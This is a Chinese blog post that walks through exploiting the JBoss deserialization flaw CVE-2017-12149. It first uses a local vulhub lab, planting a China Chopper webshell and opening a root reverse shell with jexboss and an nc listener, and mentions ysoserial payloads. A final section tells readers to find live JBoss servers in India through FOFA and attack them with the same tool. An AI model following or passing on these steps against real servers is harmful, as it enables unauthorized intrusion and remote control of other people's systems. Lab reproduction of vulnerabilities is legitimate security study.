渗透测试系列 — VulnHub–jboss

正文:

也是个漏洞复现
学java和序列化和反序列化
https://xz.aliyun.com/t/2041
暂时不去学,后来补上,这门学问不简单
service docker start
git clone https://github.com/vulhub/vulhub.git
cd vulhub/jboss/CVE-2017-12149/
docker-compose up -d
访问   http://127.0.0.1:8080/   要加8080才能正常出现
环境到这已经搭建完成
一.
1.
工具一键测试(没有做),记录一笔
A.工具一键测试
B.找到自动部署目录:先在文件管理中,找到可以自动部署的目录,shell上传的目录是:
/jboss-6.1.0.Final/server/default/deploy/ROOT.war/caidao.jsp
C.上传菜刀马:
D.菜刀连接成功:
2.
使用jexboss工具反弹shell
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -rrequires.txt
nc -lvnp 4444
python jexboss.py -host http://127.0.0.1:8080
后面是交互式选择,是否有admin-console权限,选择默认NO
Exploitation JMXInvokerServlet选择yes
选择反弹shell的主机IP和接收端口
IP Address (RHOST): 127.0.0.1
Port (RPORT): 4444
root权限   执行命令
3.
专业的Java反序列化工具ysoserial:攻击需要构造带有需要执行Payload的ser文件,然后使用curl将二进制文件提交至目标服务器的invoker/readonly页面中。详见https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149

二.实际的网站

用邮箱注册https://fofa.so/ (类似于www.shodan.io)
不用注册也可直接搜索
命令:port=8080 &&header=jboss && country=IN
找到网站,放入工具中操作吧
 
2018.7.4

发表评论

电子邮件地址不会被公开。 必填项已用*标注